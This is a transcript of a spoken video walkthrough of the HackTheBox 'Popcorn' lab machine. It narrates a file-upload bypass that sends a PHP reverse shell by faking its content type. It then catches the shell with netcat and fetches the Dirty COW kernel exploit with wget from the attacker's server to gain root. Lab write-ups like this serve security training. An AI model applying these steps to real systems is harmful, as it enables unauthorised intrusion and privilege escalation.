So in this video, I'm going to demonstrate how to complete the popcorn box from HackTheBox. This will be my first medium box that I've done for YouTube. So I've already gone ahead and done an nmap scan. If we were to take a look at it, we see two ports are open, SSH and HTTP. So we can go to the HTTP port first. And we just get this simple message. We look at the source, there's not a lot going on there. So we can do a go buster to see what directories are on this web server. 10, 10, 10, 6. We can use the word list, share word list, comment. And if we just give this a moment to run. We have a folder called Torrent. If we were to go to this folder, we see a torrent page powered by Torrent Hoster. Gives us a link there that we could go to and have a look more at this particular website. We have a username and password box here, and we also have a sign up option. So let's try to sign up. Username Gareth, password, email test@test.com. and 89B22 register. Okay, so we have a username and password here, so let's log in. Okay, so we have this upload function here where we can upload torrents. If I was to find a legit torrent, Kali torrent, if I download this one, save it to my directory. Okay, so if I was to home lab popcorn and then the torrent, we'll simply call this Kali Linux, category other, subcategory other, upload that. Now then, this does take some time to do, so in the meantime let's look at this torrent folder here. So we're going to do another go buster on this torrent directory. Torrent, yes. So we see a lot of stuff in here. Okay. So we'll just give this a minute. And it's uploaded. Okay, so we go to browse. We can see one of these is ours. I think it is this one here. Yeah, by the date. Okay, so we can edit this torrent and we can give it a picture, an image. So let's do that. Let's go to images. I have a picture of the Mona Lisa here. Also says allowed types JPEG, JPG, JPEG, GIF, and PNG. So let's submit that, and that has been submitted. But we need to find out where this has been uploaded to. If we have a look here, we have a folder called upload. And there's our image. Okay. So if we can upload a shell to this, we could get a reverse TCP connection back to our Kali Linux box. To do that, I'm going to start burp. Okay, I am going to go back to here. Okay, so I am going to point all my traffic to burp, all my web traffic, and let's go and see what happens. First of all, I'm going to do a legit picture and see the responses that we get, or see what's being sent over. If I submit that, I got two burps open here. Let's quit that one. Yes. Okay, so this is the data that's being sent here. So all this here is the actual image. We see the content type is image/JPEG, and then this is the file name and everything else to go with it. I'm going to copy this and just put it into a text editor for now. Okay, we can forward that. That is fine. And that's uploaded again. Okay, so let's find a php-reverse-shell.php, and let's copy this to our directory, and then let's rename it to something small called shell.php. So open up a new terminal and ifconfig -0, and let's set up a netcat listener 1234. So our IP is 10.10.14.2. Let's edit this. And point it to 10.10.14.2 and save. Okay, so now if we was to edit this torrent, send that, we are going to upload our shell. Actually, let's just see what happens normally. Okay, so it thinks it's a PHP file, which is correct. If we was to forward this, it says invalid file. Okay. Okay, so if you was to browse, go here and submit. Okay, so let's trick it into thinking that it's a JPEG, which we can do just by modifying the content type. And let's forward that. Let's give that a second. and we can see that shell has been uploaded and it thinks it's an image. So let's go back to our uploads folder. We can turn burp off now, and we can close it. Does this stop responding? Oh, it's still there. This is going really slow. Okay, that just took a long time. And if we was to click this link here, we have our Netcat listener open. If we was to click this, and we're on the box. So we're logged in as www-data. So first of all, let's upgrade the shell. Spawn. Control Z, stty raw -echo fg. Okay, so let's go into the home directory first, and we see the user George. Do an ls on this directory. We can see the user flag here, and it looks like we've got read permissions for that, which we do. Okay. So again, you would just take that flag and input it on the HackTheBox website. I could upload some scripts and do some recon, but that would take some time. So what I will do, I'll just jump straight into the root escalation. If we was to have a look at the uname -a, we see that this is the kernel version, okay, and we can see which version of Ubuntu this is running at. If we was to Google this and search for an exploit, we look at the first one. We see that this is vulnerable to the Dirtycow exploit. Dirtycow ptrace poke data race condition privilege escalation. We're going to download this and save it as dirty.c because it's a C file. And let's upload this to the temp folder. Okay, so we have so let's make our CaliBox a HTTP server on port 80, and let's do a wget HTTP 10.10.14.2. It is 2, isn't it? Yep, 2. .c. Okay, so we have that here. If we was to look at the exploit itself, it's even given us instructions here. So GCC, we need to make sure that GCC is enabled or installed, and it is located at that particular location. So I've already saved it as dirty.c. That's the output, and it's doing some additional parameters as well. We have a look. We see that we have a program called Dirty, and if we was to run this, think that's all we need to do. It's asking us for a password. I'll set the password as password. So it's backing up the etc password file to this particular location where we're located. It's also creating a new user called Firefart, and it's giving it root access here. So this particular kernel is quite old. If we was to have a look, it's from 2009, so it's a good few years old. And yeah, this is vulnerable to this Dirtycow exploit. If we was to do a Control-C, let's do an ls, and we see the password file that's being backed up. If we do an su as this particular user here, Firefart, it's not finding it. Let's do that again. Let's give that a moment. Okay, that worked the second time round. And we can see that our prompt has changed to this symbol here, which is different to this. So that means that we have root access. Yeah, so we're logged in as Firefart, but if we was to go into the root directory, we can see the root flag, and we are Firefart, so we can read it. So we do a wc-c on root, and there we can see the number 33, which is what we want. I think that is it for this video. Thank you for watching.